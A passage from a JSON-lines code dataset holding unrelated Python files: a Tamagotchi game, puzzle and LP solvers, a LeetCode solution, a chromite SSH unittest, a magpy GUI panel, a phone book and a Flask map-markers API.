self.isAsleep == False:\n ranNum = random.randint(0, 10)\n if ranNum == 0:\n self.condition[\"happy\"]-=30\n self.condition[\"health\"]-=20\n return \"You scarred your tamagotchi...\"\n self.condition[\"discipline\"]+=1\n\n def playTamagotchi(self):\n if self.isAsleep == False:\n self.condition[\"energy\"]-=10\n if self.condition[\"energy\"]<0:\n self.isDead = True\n ranNum = random.randint(0, 5)\n if ranNum == 0:\n self.condition[\"discipline\"]-=2\n self.pooDroppings+=1\n self.condition[\"happy\"]+=20\n self.capValues()\n return \"Your tamagotchi had fun! A little too much fun...\"\n self.condition[\"happy\"]+=10\n self.capValues()\n\n def cleanTamagotchi(self):\n self.pooDroppings-=1\n\n def sleepTamagotchi(self):\n if self.condition[\"discipline\"]<3:\n return \"You're tamagotchi refused to sleep.\"\n self.isAsleep = True\n self.sleepTimer = 10\n self.drawing = \"zzz\"\n\n def stepTamagotchi(self): # runs every 5 seconds\n self.capValues()\n if self.isAsleep == True:\n self.condition[\"energy\"]+=2\n self.sleepTimer-=1\n if self.sleepTimer == 0:\n self.isAsleep = False\n self.capValues()\n if self.isAsleep == False:\n self.age+=1\n maybePoo = random.randint(0,5)\n if maybePoo == 0:\n self.pooDroppings+=1\n pooDamage = random.randint(self.pooDroppings-2, self.pooDroppings+2)\n self.condition[\"health\"]-=pooDamage*2\n self.condition[\"food\"]-=2\n if self.isSick == True:\n self.condition[\"health\"]-=5\n self.capValues()\n self.sickTimer-=1\n if self.sickTimer == 0:\n self.isSick = False\n else:\n self.condition[\"happy\"]-=1\n self.condition[\"energy\"]-=1\n healthUp = random.randint(0, (self.condition[\"happy\"] + self.condition[\"energy\"])//30)\n self.condition[\"health\"]+= healthUp\n getSick = random.randint(0, self.condition[\"energy\"] + self.condition[\"happy\"]//2)\n if getSick < 5:\n self.isSick = True\n self.sickTimer = 5\n self.capValues()\n if self.condition[\"happy\"] > 90:\n self.expression = \"> W <\"\n elif self.condition[\"happy\"] > 60:\n self.expression = \"0 u 0\"\n elif self.condition[\"happy\"] > 40:\n self.expression = \"- _ -\"\n else:\n self.expression = \"T _ T\"\n willDieSick = random.randint(0, self.condition[\"health\"]**2)\n willDieStarve = random.randint(0, self.condition[\"food\"]**2)\n if self.age > 100:\n self.isDead = True\n self.deathNote = \"Your tamagotchi passed away peacefully <3 YOU WIN!\"\n self.expression = \"X w X\"\n if self.condition[\"health\"]<20 or willDieSick == 0:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of illness.\"\n self.expression = \"X _ X\"\n if self.condition[\"happy\"]<10:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of depression.\"\n self.expression = \"X _ X\"\n if self.condition[\"energy\"]<10:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of exhaustion.\"\n self.expression = \"X _ X\"\n if self.condition[\"food\"]<20 or willDieStarve == 0:\n self.isDead = True\n self.deathNote = \"Your tamagotchi died of starvation.\"\n self.expression = \"X _ X\"\n self.drawing = self.expression\n self.drawing += \"*\"*self.pooDroppings\n self.capValues()\n time.sleep(5)\n","repo_name":"joying-yang/Web-Surfing-Without-Wifi","sub_path":"app/tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29309079081","text":"def is_symmetric(word):\n length = len(word)\n if length%2 == 0: mid = length//2\n else: mid = (length//2)+1\n start1 = 0\n start2 = mid\n\n while (start1 < mid and start2 < length):\n if word[start1] != word[start2]:\n return False\n start2+= 1\n start1+=1\n return True\n\nword = input('Enter a word: ')\n\nprint('symmetric') if is_symmetric(word) else print('Not Symmetric')","repo_name":"CHARANREDDY-learntocode/python_practise","sub_path":"strings/symmetrical.py","file_name":"symmetrical.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18336921472","text":"from enum import Enum\n\nclass ITEM(Enum):\n EMPTY = 0\n WALL = 1\n BOMB = 2\n TARGET = 3\n MIRROR = 4\n SOURCE = 5\n SPLIT = 6\n SCATTER = 7\n\nclass DIR(Enum):\n TOP_LEFT = 0\n TOP = 1\n TOP_RIGHT = 2\n RIGHT = 3\n BOTTOM_RIGHT = 4\n BOTTOM = 5\n BOTTOM_LEFT = 6\n LEFT = 7\n\n\ndef getNeighboursFromNewOutsAndGetTheirInputs(current_item_index, n, new_outs):\n i = int(current_item_index / n)\n j = current_item_index % n\n\n neighbourConnectionMap = {(-1,-1): 0, (-1,0): 1, (-1,1): 2, (0,1): 3, (1,1): 4, (1,0): 5, (1,-1): 6, (0,-1): 7}\n\n res = []\n for ii in [-1,0,1]:\n for jj in [-1,0,1]:\n neig_i = i + ii\n neig_j = j + jj\n #first check if the neighbor is within the box\n if((neig_i < n) and (neig_i > -1) and (neig_j < n) and (neig_j > -1) and not ((neig_i == i) and (neig_j == j))): \n # check if the output corresponding to the neightbor is 1\n neighbour_dir = neighbourConnectionMap[ii, jj]\n if(new_outs[neighbour_dir]):\n input_dir_for_the_neighbour = (neighbour_dir + 4) % 8 \n res.append((neig_i * n + neig_j, input_dir_for_the_neighbour))\n return res\n\ndef getNewOutsForCurrent(item, item_dir, ins_cur, outs_cur):\n res = [0,0,0,0,0,0,0,0]\n\n if item == ITEM.BOMB:\n return res\n elif item == ITEM.EMPTY or item == ITEM.TARGET:\n ins_rotated_by_four = ins_cur[-4:]+ins_cur[:-4]\n # we are only returning new outs so, if it waas already out before then we do ot return it\n res = [1 if a1 == 1 and a2 != 1 else 0 for a1, a2 in zip(ins_rotated_by_four, outs_cur)]\n elif item == ITEM.MIRROR:\n left_dir = (item_dir - 1) % 8\n right_dir = (item_dir + 1) % 8\n\n if ins_cur[item_dir] == 1 and outs_cur[item_dir] != 1:\n res[item_dir] = 1\n\n if ins_cur[left_dir] == 1 and outs_cur[right_dir] != 1:\n res[right_dir] = 1\n\n if ins_cur[right_dir] == 1 and outs_cur[left_dir] != 1:\n res[left_dir] = 1\n elif item == ITEM.SCATTER:\n left_dir = (item_dir - 3) % 8\n right_dir = (item_dir + 3) % 8\n\n if ins_cur[item_dir] == 1:\n if outs_cur[right_dir] != 1:\n res[right_dir] = 1\n if outs_cur[left_dir] != 1:\n res[left_dir] = 1\n\n if (ins_cur[left_dir] == 1 or ins_cur[right_dir] == 1) and outs_cur[item_dir] != 1:\n res[item_dir] = 1\n elif item == ITEM.SOURCE:\n if outs_cur[item_dir] != 1:\n res[item_dir] = 1\n elif item == ITEM.SPLIT:\n left_dir = (item_dir - 2) % 8\n right_dir = (item_dir + 2) % 8\n\n if ins_cur[item_dir] == 1:\n if outs_cur[right_dir] != 1:\n res[right_dir] = 1\n if outs_cur[left_dir] != 1:\n res[left_dir] = 1\n elif item == ITEM.WALL:\n return res\n\n return res\n\ndef BoardGenerate(items, item_dirs, n):\n ins = [[0] * 8 for _ in range(n * n)]\n outs = [[0] * 8 for _ in range(n * n)]\n\n source_indices = [index for index, value in enumerate(items) if value == ITEM.SOURCE]\n\n queue = source_indices\n \n while len(queue) > 0:\n current_item_index = queue.pop(0)\n item = items[current_item_index]\n item_dir = item_dirs[current_item_index]\n ins_cur = ins[current_item_index]\n outs_cur = outs[current_item_index]\n new_outs = getNewOutsForCurrent(item, item_dir.value, ins_cur, outs_cur)\n \n neigs = getNeighboursFromNewOutsAndGetTheirInputs(current_item_index, n, new_outs)\n \n for neig in neigs:\n (neigh_index, neigh_input_dir) = neig\n if neigh_index not in queue:\n queue.append(neigh_index)\n\n #update ins for the new outs coming from current_item\n ins[neigh_index][neigh_input_dir] = 1\n\n # update outs for the current_index with new_outs\n updated_cur_out = [1 if a1 == 1 or a2 == 1 else 0 for a1, a2 in zip(new_outs, outs_cur)]\n outs[current_item_index] = updated_cur_out\n\n return ins, outs\n\ndef main():\n n = 3\n #items = [ITEM.EMPTY] * n * n\n #item_dirs = [DIR.TOP] * n * n\n \n #items = [ITEM.EMPTY, ITEM.MIRROR, ITEM.MIRROR, ITEM.EMPTY, ITEM.SOURCE, ITEM.EMPTY, ITEM.BOMB, ITEM.WALL, ITEM.TARGET]\n #item_dirs = [DIR.TOP,DIR.BOTTOM_RIGHT, DIR.BOTTOM_LEFT, DIR.BOTTOM_LEFT,DIR.TOP, DIR.TOP, DIR.TOP, DIR.TOP, DIR.TOP]\n \n items = [ITEM.SOURCE, ITEM.SOURCE, ITEM.TARGET, ITEM.BOMB, ITEM.SPLIT, ITEM.MIRROR, ITEM.WALL, ITEM.TARGET, ITEM.EMPTY]\n item_dirs = [DIR.BOTTOM_RIGHT,DIR.BOTTOM_RIGHT, DIR.BOTTOM_LEFT, DIR.BOTTOM_LEFT,DIR.TOP_LEFT, DIR.LEFT, DIR.TOP, DIR.TOP, DIR.TOP]\n \n #items[94] = ITEM.SOURCE\n ins, outs = BoardGenerate(items, item_dirs, n)\n\n #for inx in ins:\n # print(inx)\n #print(\"---------------------------------\")\n #for outx in outs:\n # print(outx)\n\n\nmain()","repo_name":"erhant/zkAargon","sub_path":"misc/board_generator.py","file_name":"board_generator.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"43787210465","text":"import math\r\nimport numpy as np\r\nfrom ortools.linear_solver import pywraplp\r\nfrom ortools.linear_solver.pywraplp import Constraint, Variable, Objective\r\nfrom FullyMobile.utils import calculate_dist\r\nimport time\r\n\r\nclass FlowLP():\r\n def __init__(self, potential_facilities, location_directory, pid_assignment, m, k_facs, radius, solver_id: str = \"GLOP\"):\r\n\r\n self.solver = pywraplp.Solver.CreateSolver(solver_id)\r\n \r\n self.potential_facilities = potential_facilities\r\n self.location_directory = location_directory\r\n self.pid_assignment = pid_assignment\r\n self.k = k_facs\r\n self.m = m\r\n self.radius = radius\r\n self.max_timestep = max(pid_assignment.keys())\r\n\r\n self.client_balls = self.calculate_client_balls()\r\n\r\n # Partial evaluation storage\r\n self.partials = {}\r\n\r\n start_var = time.time()\r\n self.init_variables()\r\n end_var = time.time()\r\n \r\n print(end_var-start_var)\r\n \r\n start_var = time.time()\r\n self.init_constraints()\r\n end_var = time.time()\r\n \r\n print(end_var-start_var)\r\n\r\n \r\n def calculate_client_balls(self, n_jobs = 40):\r\n \r\n client_balls = {}\r\n \r\n for time in self.pid_assignment.keys():\r\n client_balls[time] = {}\r\n for pid, pid_loc in self.pid_assignment[time]:\r\n client_balls[time][pid_loc] = []\r\n \r\n for pf in self.potential_facilities:\r\n coord_1 = (self.location_directory[pf][\"latitude\"], self.location_directory[pf][\"longitude\"])\r\n coord_2 = (self.location_directory[pid_loc][\"latitude\"], self.location_directory[pid_loc][\"longitude\"])\r\n \r\n dist = calculate_dist(coord_1, coord_2)\r\n if dist<=self.radius:\r\n client_balls[time][pid_loc].append(pf)\r\n \r\n return client_balls\r\n \r\n def init_variables(self):\r\n \"\"\"Declare variables as needed\"\"\"\r\n \r\n # indicator variable for whether facility is in solution\r\n self.Y = {}\r\n \r\n # indicator variable for whether client is serviced by a facility\r\n self.X = {}\r\n \r\n # indicator variable for movement between timesteps\r\n self.Z = {}\r\n \r\n for time in self.pid_assignment.keys():\r\n self.Y[time] = {}\r\n self.X[time] = {}\r\n self.Z[time] = {}\r\n \r\n for fac in self.potential_facilities:\r\n self.Y[time][fac] = self.solver.NumVar(0, 1, f\"y_{time}{fac}\")\r\n self.X[time][fac] = {}\r\n self.Z[time][fac] = {}\r\n \r\n for pid, pid_loc in self.pid_assignment[time]:\r\n if pid_loc not in self.X[time][fac].keys():\r\n self.X[time][fac][pid_loc] = self.solver.NumVar(0, 1, f\"x_{time}{fac}{pid_loc}\")\r\n \r\n if time!=self.max_timestep:\r\n for next_fac in self.potential_facilities:\r\n self.Z[time][fac][next_fac] = self.solver.NumVar(0, 1, f\"z_{time}{fac}{next_fac}\") \r\n\r\n def init_constraints(self):\r\n \"\"\"Initializes the constraints according to the relaxed LP formulation of MinExposed\"\"\"\r\n\r\n # budget constraint for each timestep\r\n self.budget_constraints = {}\r\n \r\n # constraint for facility and client assignment\r\n self.client_constraints = {}\r\n \r\n # constraint for movement\r\n self.leave_constraints = {}\r\n self.enter_constraints = {}\r\n\r\n for time in self.Y.keys():\r\n self.budget_constraints[time] = self.solver.Constraint(0, self.k, f\"budget_{time}\")\r\n for fac, y_var in self.Y[time].items():\r\n self.budget_constraints[time].SetCoefficient(y_var, 1)\r\n \r\n # constraint for facility assignment\r\n for pid_loc, x_var in self.X[time][fac].items():\r\n self.solver.Add(x_var <= y_var)\r\n \r\n self.client_constraints[time] = {}\r\n for pid, pid_loc in self.pid_assignment[time]:\r\n if pid_loc not in self.client_constraints[time].keys():\r\n self.client_constraints[time][pid_loc] = self.solver.Constraint(1, 1, f\"client_assignment_{time}_{pid_loc}\")\r\n \r\n for pf in self.client_balls[time][pid_loc]:\r\n self.client_constraints[time][pid_loc].SetCoefficient(self.X[time][pf][pid_loc], 1)\r\n\r\n if time != self.max_timestep:\r\n \r\n self.leave_constraints[time] = {}\r\n self.enter_constraints[time] = {}\r\n \r\n for fac, y_var in self.Y[time].items():\r\n #self.leave_constraints[fac] = self.solver.Constraint(y_var, y_var, f\"leave_constraint_{time}_{fac}\")\r\n self.leave_constraints[fac] = self.solver.Add(self.solver.Sum([z_var for z_var in self.Z[time][fac].values()]) == y_var)\r\n for next_fac, z_var in self.Z[time][fac].items():\r\n #self.leave_constraints[fac].SetCoefficient(z_var, 1)\r\n \r\n coord_1 = (self.location_directory[fac][\"latitude\"], self.location_directory[fac][\"longitude\"])\r\n coord_2 = (self.location_directory[next_fac][\"latitude\"], self.location_directory[next_fac][\"longitude\"])\r\n \r\n dist = calculate_dist(coord_1, coord_2)\r\n if dist > self.m:\r\n self.solver.Add(self.Z[time][fac][next_fac] == 0)\r\n \r\n for next_fac, y_var in self.Y[time+1].items():\r\n self.enter_constraints[next_fac] = self.solver.Add(self.solver.Sum([self.Z[time][fac][next_fac] for fac in self.Z[time].keys()]) == y_var)\r\n #self.solver.Constraint(y_var, y_var, f\"enter_constraint_{time}_{next_fac}\")\r\n #for fac in self.Z[time].keys():\r\n # self.enter_constraints[next_fac].SetCoefficient(self.Z[time][fac][next_fac], 1)\r\n\r\n def solve_lp(self):\r\n \r\n self.status = self.solver.Solve()\r\n \r\n if self.status == pywraplp.Solver.OPTIMAL:\r\n print('Problem solved in %f milliseconds' % self.solver.wall_time())\r\n print('Problem solved in %d iterations' % self.solver.iterations())\r\n else:\r\n print('The problem does not have an optimal solution.')\r\n\r\n def get_variable_solution(self):\r\n if self.status == pywraplp.Solver.OPTIMAL:\r\n y = {time: {fac: self.Y[time][fac].solution_value() for fac in self.Y[time].keys()} for time in self.Y.keys()}\r\n x = {time: {fac: {pid: self.X[time][fac][pid].solution_value() for pid in self.X[time][fac].keys()} for fac in self.X[time].keys()} for time in self.X.keys()}\r\n z = {time: {fac: {next_fac: self.Z[time][fac][next_fac].solution_value() for next_fac in self.Z[time][fac].keys()} for fac in self.Z[time].keys()} for time in self.Z.keys()}\r\n return y, x, z\r\n else:\r\n print(\"Not optimal\")\r\n return {}, {}, {}\r\n \r\n ","repo_name":"Ann924/FullyMobileFacilities","sub_path":"FullyMobile/lp.py","file_name":"lp.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24702653223","text":"# An ugly number is a positive integer whose prime factors are limited to 2, 3, and 5.\n# Given an integer n, return true if n is an ugly number.\nclass Solution(object):\n def isUgly(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n<=0:\n return False\n if n==1:\n return True\n q, r = divmod(n, 2)\n if r == 0:\n return self.isUgly(q)\n else:\n q, r = divmod(n, 3)\n if r == 0:\n return self.isUgly(q)\n else:\n q, r = divmod(n, 5)\n if r==0:\n return self.isUgly(q)\n else:\n return False\n\nn=20\nsolution=Solution()\nprint(solution.isUgly(n))","repo_name":"danqing36/leetcode","sub_path":"Hashtable/263_Ugly_Number.py","file_name":"263_Ugly_Number.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682323340","text":"import os\nimport re\nimport sys\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)),\n '..', '..'))\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_build_lib_unittest\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import partial_mock\nfrom chromite.lib import remote_access\n\n# pylint: disable=W0212\n\n\nclass RemoteShMock(partial_mock.PartialCmdMock):\n\n TARGET = 'chromite.lib.remote_access.RemoteAccess'\n ATTRS = ('RemoteSh',)\n DEFAULT_ATTR = 'RemoteSh'\n\n def RemoteSh(self, inst, cmd, *args, **kwargs):\n \"\"\"Simulates a RemoteSh invocation.\"\"\"\n result = self._results['RemoteSh'].LookupResult(\n (cmd,), hook_args=(inst, cmd,) + args, hook_kwargs=kwargs)\n\n # Run the real RemoteSh with RunCommand mocked out.\n rc_mock = cros_build_lib_unittest.RunCommandMock()\n rc_mock.AddCmdResult(\n partial_mock.Ignore(), result.returncode, result.output,\n result.error)\n\n with rc_mock:\n return self.backup['RemoteSh'](inst, cmd, *args, **kwargs)\n\n\nclass RemoteAccessTest(cros_test_lib.MockTempDirTestCase):\n\n def setUp(self):\n self.rsh_mock = self.StartPatcher(RemoteShMock())\n self.host = remote_access.RemoteAccess('foon', self.tempdir)\n\n\nclass RemoteShTest(RemoteAccessTest):\n\n TEST_CMD = 'ls'\n RETURN_CODE = 0\n OUTPUT = 'witty'\n ERROR = 'error'\n\n def assertRemoteShRaises(self, **kwargs):\n self.assertRaises(cros_build_lib.RunCommandError, self.host.RemoteSh,\n self.TEST_CMD, **kwargs)\n\n def SetRemoteShResult(self, returncode=RETURN_CODE, output=OUTPUT,\n error=ERROR):\n self.rsh_mock.AddCmdResult(self.TEST_CMD, returncode=returncode,\n output=output, error=error)\n\n def testNormal(self):\n \"\"\"Test normal functionality.\"\"\"\n self.SetRemoteShResult()\n result = self.host.RemoteSh(self.TEST_CMD)\n self.assertEquals(result.returncode, self.RETURN_CODE)\n self.assertEquals(result.output.strip(), self.OUTPUT)\n self.assertEquals(result.error.strip(), self.ERROR)\n\n def testRemoteCmdFailure(self):\n \"\"\"Test failure in remote cmd.\"\"\"\n self.SetRemoteShResult(returncode=1)\n self.assertRemoteShRaises()\n self.assertRemoteShRaises(ssh_error_ok=True)\n self.host.RemoteSh(self.TEST_CMD, error_code_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True, error_code_ok=True)\n\n def testSshFailure(self):\n \"\"\"Test failure in ssh commad.\"\"\"\n self.SetRemoteShResult(returncode=remote_access.SSH_ERROR_CODE)\n self.assertRemoteShRaises()\n self.assertRemoteShRaises(error_code_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True, error_code_ok=True)\n\n\nclass CheckIfRebootedTest(RemoteAccessTest):\n\n def MockCheckReboot(self, returncode):\n self.rsh_mock.AddCmdResult(\n partial_mock.Regex('.*%s.*' % re.escape(remote_access.REBOOT_MARKER)),\n returncode)\n\n def testSuccess(self):\n \"\"\"Test the case of successful reboot.\"\"\"\n self.MockCheckReboot(0)\n self.assertTrue(self.host._CheckIfRebooted())\n\n def testRemoteFailure(self):\n \"\"\"Test case of reboot pending.\"\"\"\n self.MockCheckReboot(1)\n self.assertFalse(self.host._CheckIfRebooted())\n\n def testSshFailure(self):\n \"\"\"Test case of connection down.\"\"\"\n self.MockCheckReboot(remote_access.SSH_ERROR_CODE)\n self.assertFalse(self.host._CheckIfRebooted())\n\n def testInvalidErrorCode(self):\n \"\"\"Test case of bad error code returned.\"\"\"\n self.MockCheckReboot(2)\n self.assertRaises(Exception, self.host._CheckIfRebooted)\n\n\nif __name__ == '__main__':\n cros_test_lib.main()\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/lib/remote_access_unittest.py","file_name":"remote_access_unittest.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"25866769474","text":"import noggin_constants as NogginConstants\nfrom objects import Location\n\nKICK_STRAIGHT_BEARING_THRESH = 20\n\n(LEFT_FOOT,\n RIGHT_FOOT,\n MID_LEFT,\n MID_RIGHT,\n INCORRECT_POS ) = range(5)\n\n# Kick objectives\nNUM_OBJECTIVES = 6\n(OBJECTIVE_CLEAR,\n OBJECTIVE_CENTER,\n OBJECTIVE_SHOOT_CLOSE,\n OBJECTIVE_SHOOT_FAR,\n OBJECTIVE_KICKOFF,\n OBJECTIVE_UNCLEAR) = range(NUM_OBJECTIVES)\n","repo_name":"northern-bites/nbites","sub_path":"src/man/behaviors/players/KickingConstants.py","file_name":"KickingConstants.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"10713243661","text":"#!/usr/bin/env python\n\ntry:\n from magpy.stream import *\n from magpy.absolutes import *\n from magpy.transfer import *\n from magpy.database import *\nexcept:\n from magpy.stream import *\n from magpy.absolutes import *\n from magpy.transfer import *\n from magpy.database import *\n\nimport wx\n\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\nfrom matplotlib.figure import Figure\n\n\n\nclass AbsolutePage(wx.Panel):\n #def __init__(self, parent):\n #wx.Panel.__init__(self,parent,-1,size=(100,100))\n def __init__(self, *args, **kwds):\n wx.Panel.__init__(self, *args, **kwds)\n self.comp = ['xyz', 'hdz', 'idf']\n self.dipathlist = []\n self.createControls()\n self.doLayout()\n self.extension = '*'\n\n # Widgets\n def createControls(self):\n self.diLabel = wx.StaticText(self, label=\"DI files:\")\n self.loadDIButton = wx.Button(self,-1,\"Load DI data\",size=(160,30))\n self.diTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.defineVarioButton = wx.Button(self,-1,\"Variometer path\",size=(160,30))\n self.varioTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.varioextLabel = wx.StaticText(self, label=\"ext: e.g. *, *.sec, *.cdf\")\n self.varioextTextCtrl = wx.TextCtrl(self, value=\"*.min\",size=(160,40))\n self.defineScalarButton = wx.Button(self,-1,\"Scalar path\",size=(160,30))\n self.scalarTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.scalarextLabel = wx.StaticText(self, label=\"ext: e.g. *, *.sec, *.cdf\")\n self.scalarextTextCtrl = wx.TextCtrl(self, value=\"*.min\",size=(160,40))\n self.AnalyzeButton = wx.Button(self,-1,\"Analyze\",size=(160,30))\n self.logLabel = wx.StaticText(self, label=\"Logging:\")\n self.advancedButton = wx.Button(self,-1,\"Set parameter\",size=(160,30))\n self.ClearLogButton = wx.Button(self,-1,\"Clear Log\",size=(160,30))\n self.SaveLogButton = wx.Button(self,-1,\"Save Log\",size=(160,30))\n self.dilogTextCtrl = wx.TextCtrl(self, wx.ID_ANY, size=(330,300),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n\n\n def doLayout(self):\n\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n # Title\n #self.centred_text = wx.StaticText(self, label=\"DI Analysis\")\n #mainSizer.Add(self.centred_text, 0, wx.ALIGN_CENTRE | wx.ALL, 3)\n\n # Grids\n #content_sizer = wx.BoxSizer(wx.HORIZONTAL)\n #grid_1 = wx.GridSizer(12, 2, 0, 0)\n #grid_1.AddMany(wx.StaticText(self.panel, label=str(i)) for i in xrange(24))\n #content_sizer.Add(grid_1, 1, wx.EXPAND | wx.ALL, 3)\n #grid_2 = wx.GridSizer(10, 3, 0, 0)\n #grid_2.AddMany(wx.StaticText(self.panel, label=str(i)) for i in xrange(30))\n #content_sizer.Add(grid_2, 1, wx.EXPAND | wx.ALL, 3)\n\n # A horizontal BoxSizer will contain the GridSizer (on the left)\n # and the logger text control (on the right):\n boxSizer = wx.BoxSizer(orient=wx.HORIZONTAL)\n # A GridSizer will contain the other controls:\n gridSizer = wx.FlexGridSizer(rows=10, cols=2, vgap=10, hgap=10)\n\n # Prepare some reusable arguments for calling sizer.Add():\n expandOption = dict(flag=wx.EXPAND)\n noOptions = dict()\n emptySpace = ((0, 0), noOptions)\n\n # Add the controls to the sizers:\n for control, options in \\\n [(self.loadDIButton, dict(flag=wx.ALIGN_CENTER)),\n (self.diTextCtrl, expandOption),\n (self.defineVarioButton, dict(flag=wx.ALIGN_CENTER)),\n (self.varioTextCtrl, expandOption),\n (self.varioextLabel, noOptions),\n (self.varioextTextCtrl, expandOption),\n (self.defineScalarButton, dict(flag=wx.ALIGN_CENTER)),\n (self.scalarTextCtrl, expandOption),\n (self.scalarextLabel, noOptions),\n (self.scalarextTextCtrl, expandOption),\n emptySpace,\n emptySpace,\n (self.diLabel, noOptions),\n emptySpace,\n (self.AnalyzeButton, dict(flag=wx.ALIGN_CENTER)),\n (self.advancedButton, dict(flag=wx.ALIGN_CENTER)),\n emptySpace,\n emptySpace,\n (self.logLabel, noOptions),\n emptySpace,\n (self.ClearLogButton, dict(flag=wx.ALIGN_CENTER)),\n (self.SaveLogButton, dict(flag=wx.ALIGN_CENTER))]:\n gridSizer.Add(control, **options)\n\n for control, options in \\\n [(gridSizer, dict(border=5, flag=wx.ALL))]:\n boxSizer.Add(control, **options)\n\n\n mainSizer.Add(boxSizer, 1, wx.EXPAND)\n\n self.centred_text = wx.StaticText(self, label=\"DI Analysis Log:\")\n mainSizer.Add(self.centred_text, 0, wx.ALIGN_LEFT | wx.ALL, 3)\n mainSizer.Add(self.dilogTextCtrl, 0, wx.ALIGN_LEFT | wx.ALL, 3)\n\n self.SetSizerAndFit(mainSizer)\n\n #boxSizer.Add(self.dilogTextCtrl, 0, wx.ALL|wx.CENTER, 5)\n #boxSizer.Add(self.dilogTextCtrl,expandOption, dict(border=5, flag=wx.ALL))\n #self.SetSizerAndFit(boxSizer)\n","repo_name":"andrewkovachik/magpy","sub_path":"magpy/gui/absolutespage.py","file_name":"absolutespage.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"30104221560","text":"import sys\n\nidsFile = sys.argv[1]\nNamesAndIdsFile = sys.argv[2]\noname = sys.argv[3]\n\nwith open(idsFile) as f:\n content = f.readlines()\nids = [x.strip() for x in content]\n\nIdToName = {}\nwith open(NamesAndIdsFile) as f:\n content = f.readlines()\ncontent = [x.strip() for x in content]\nfor line in content:\n\ttup = line.split()\n\tIdToName[tup[2]] = tup[1][4:]\n\nwith open(oname, 'w') as fd:\t\t\n\tfor i in ids:\n\t\tif i == \"\":\n\t\t\tcontinue\t\n\t\tfd.write(\"SyS_\" + IdToName[i] + '\\n')\n\t\tfd.write(\"sys_\" + IdToName[i] + '\\n')","repo_name":"wliuxingxiangyu/kernel-specialization","sub_path":"examples/generateSysCallList.py","file_name":"generateSysCallList.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"26087118133","text":"# Создать телефонный справочник с возможностью импорта и экспорта данных в нескольких форматах.\n\n\nimport os\nimport user_interface as ui\nimport csv_model as cm\nimport database_methods as dm\n\nkey_in = ui.first_menu()\nif key_in == 2:\n exit()\nelif key_in == 1:\n file_name = ui.file_name()\n if not os.path.isfile(file_name):\n cm.write_file(file_name, [])\n list_file_element = cm.read_file(file_name)\n\nwhile True:\n key_in = ui.second_menu()\n if key_in == 3:\n exit()\n elif key_in == 1:\n dm.output_list(list_file_element)\n elif key_in == 2:\n dm.add_record(list_file_element)\n cm.write_file(file_name, list_file_element)\n\n","repo_name":"MikleKho/Python_basics_HW_Lesson07","sub_path":"Task_07_01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"878011786","text":"\"\"\"API endpoints for the maps' app.\"\"\"\n\nfrom flask import request\nfrom flask_restx import Resource, fields, marshal_with\n\nfrom maps.apis import api\nfrom maps.routes import get_all_markers, to_date, add_report_to_db\n\nget_model = api.model(\n \"Report\",\n {\n \"id\": fields.Integer,\n \"latitude\": fields.Float,\n \"longitude\": fields.Float,\n \"color\": fields.String,\n \"comment\": fields.String,\n \"created_at\": fields.DateTime(dt_format=\"rfc822\"),\n },\n)\n\npost_model = api.model(\n \"Report\",\n {\n \"latitude\": fields.Float,\n \"longitude\": fields.Float,\n \"color\": fields.String,\n \"comment\": fields.String(required=False),\n },\n)\n\n\n@api.route(\"/markers//\", methods=[\"GET\"])\nclass Report(Resource):\n \"\"\"Report resource from Report DB model.\"\"\"\n\n @marshal_with(get_model)\n def get(self, date):\n \"\"\"\n Retrieve all markers with date provided.\n Use 2022-08-14 arg date format to get all markers from 14 August 2022.\n \"\"\"\n return get_all_markers(request_date=to_date(date))\n\n\n@api.route(\"/markers/\", methods=[\"POST\", \"PUT\"])\nclass AddReport(Resource):\n \"\"\"Add Report resource to DB model.\"\"\"\n\n 